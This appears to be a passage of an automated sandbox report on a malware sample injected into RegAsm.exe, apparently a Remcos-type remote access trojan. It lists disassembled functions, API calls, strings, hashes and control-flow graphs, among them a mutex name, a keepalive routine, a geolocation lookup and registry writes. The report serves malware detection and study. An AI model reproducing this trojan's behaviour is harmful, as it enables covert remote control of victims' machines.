                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                        • String ID:
                                                                        • API String ID: 3658366068-0
                                                                        • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                        • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                                                        Control-flow Graph: rendering not reproduced. Function 0x40DA34-0x40DC1B: a multi-way branch at 0x40DA5F, a call to the subroutine at 0x41BFB7 from 0x40DAA5 that selects one of two branches (0x40DAAE or 0x40DB00), then GetLongPathNameW in the block at 0x40DB83.
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                        • API String ID: 82841172-425784914
                                                                        • Opcode ID: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                        • Opcode Fuzzy Hash: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                                        Control-flow Graph: rendering not reproduced. Function 0x41B2C3-0x41B37F: registry read via the subcall at 0x4135A6, StrToIntA at 0x41B33C, a conditional call to 0x41CF69 at 0x41B349, ending in a call to 0x40537D at 0x41B374.
                                                                        APIs
                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                        • String ID: (32 bit)$ (64 bit)$@5U$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                        • API String ID: 782494840-3750562216
                                                                        • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                        • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                        control_flow_graph 1515 44ac49-44ac62 1516 44ac64-44ac74 call 446766 1515->1516 1517 44ac78-44ac7d 1515->1517 1516->1517 1525 44ac76 1516->1525 1519 44ac7f-44ac87 1517->1519 1520 44ac8a-44acae MultiByteToWideChar 1517->1520 1519->1520 1522 44acb4-44acc0 1520->1522 1523 44ae41-44ae54 call 434fcb 1520->1523 1526 44ad14 1522->1526 1527 44acc2-44acd3 1522->1527 1525->1517 1531 44ad16-44ad18 1526->1531 1528 44acd5-44ace4 call 457190 1527->1528 1529 44acf2-44ad03 call 446137 1527->1529 1534 44ae36 1528->1534 1540 44acea-44acf0 1528->1540 1529->1534 1541 44ad09 1529->1541 1531->1534 1535 44ad1e-44ad31 MultiByteToWideChar 1531->1535 1539 44ae38-44ae3f call 435e40 1534->1539 1535->1534 1538 44ad37-44ad49 call 448bb3 1535->1538 1545 44ad4e-44ad52 1538->1545 1539->1523 1544 44ad0f-44ad12 1540->1544 1541->1544 1544->1531 1545->1534 1547 44ad58-44ad5f 1545->1547 1548 44ad61-44ad66 1547->1548 1549 44ad99-44ada5 1547->1549 1548->1539 1550 44ad6c-44ad6e 1548->1550 1551 44ada7-44adb8 1549->1551 1552 44adf1 1549->1552 1550->1534 1553 44ad74-44ad8e call 448bb3 1550->1553 1555 44add3-44ade4 call 446137 1551->1555 1556 44adba-44adc9 call 457190 1551->1556 1554 44adf3-44adf5 1552->1554 1553->1539 1567 44ad94 1553->1567 1558 44adf7-44ae10 call 448bb3 1554->1558 1559 44ae2f-44ae35 call 435e40 1554->1559 1555->1559 1571 44ade6 1555->1571 1556->1559 1570 44adcb-44add1 1556->1570 1558->1559 1573 44ae12-44ae19 1558->1573 1559->1534 1567->1534 1572 44adec-44adef 1570->1572 1571->1572 1572->1554 1574 44ae55-44ae5b 1573->1574 1575 44ae1b-44ae1c 1573->1575 1576 44ae1d-44ae2d WideCharToMultiByte 1574->1576 1575->1576 1576->1559 1577 44ae5d-44ae64 call 435e40 1576->1577 1577->1539
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                        • __freea.LIBCMT ref: 0044AE30
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • __freea.LIBCMT ref: 0044AE39
                                                                        • __freea.LIBCMT ref: 0044AE5E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 3864826663-0
                                                                        • Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                        • Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                        control_flow_graph 1643 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1648 41b3c5-41b3e6 InternetReadFile 1643->1648 1649 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1648->1649 1650 41b40c-41b40f 1648->1650 1649->1650 1652 41b411-41b413 1650->1652 1653 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1650->1653 1652->1648 1652->1653 1657 41b427-41b431 1653->1657
                                                                        APIs
                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                        Strings
                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                        • String ID: http://geoplugin.net/json.gp
                                                                        • API String ID: 3121278467-91888290
                                                                        • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                        • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                        • __freea.LIBCMT ref: 10008A08
                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                        • __freea.LIBCMT ref: 10008A11
                                                                        • __freea.LIBCMT ref: 10008A36
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1414292761-0
                                                                        • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                        • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                        • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                        • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountEventTick
                                                                        • String ID: !D@$NG
                                                                        • API String ID: 180926312-2721294649
                                                                        • Opcode ID: a462973d742854930533713db4b247c4557c7a610cccef5313c8c1b0fc3ae439
                                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                        • Opcode Fuzzy Hash: a462973d742854930533713db4b247c4557c7a610cccef5313c8c1b0fc3ae439
                                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$EventLocalThreadTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 2532271599-1507639952
                                                                        • Opcode ID: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                        • Opcode Fuzzy Hash: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                        • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                        • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                        • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3360349984-0
                                                                        • Opcode ID: c82d23fa68d4f54fa7345513474a4fa3003979eb866de3c2de6de2f22e2b7063
                                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                        • Opcode Fuzzy Hash: c82d23fa68d4f54fa7345513474a4fa3003979eb866de3c2de6de2f22e2b7063
                                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2905821283-0
                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                        • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3177248105-0
                                                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                        • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3177248105-0
                                                                        • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                        • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                        • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                        • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 3919263394-0
                                                                        • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                        • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,@5U,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                        • String ID: @5U
                                                                        • API String ID: 1170566393-921383711
                                                                        • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                        • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                                        • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                        • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID: Rmc-R2I0JW
                                                                        • API String ID: 1925916568-2751493137
                                                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                          • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
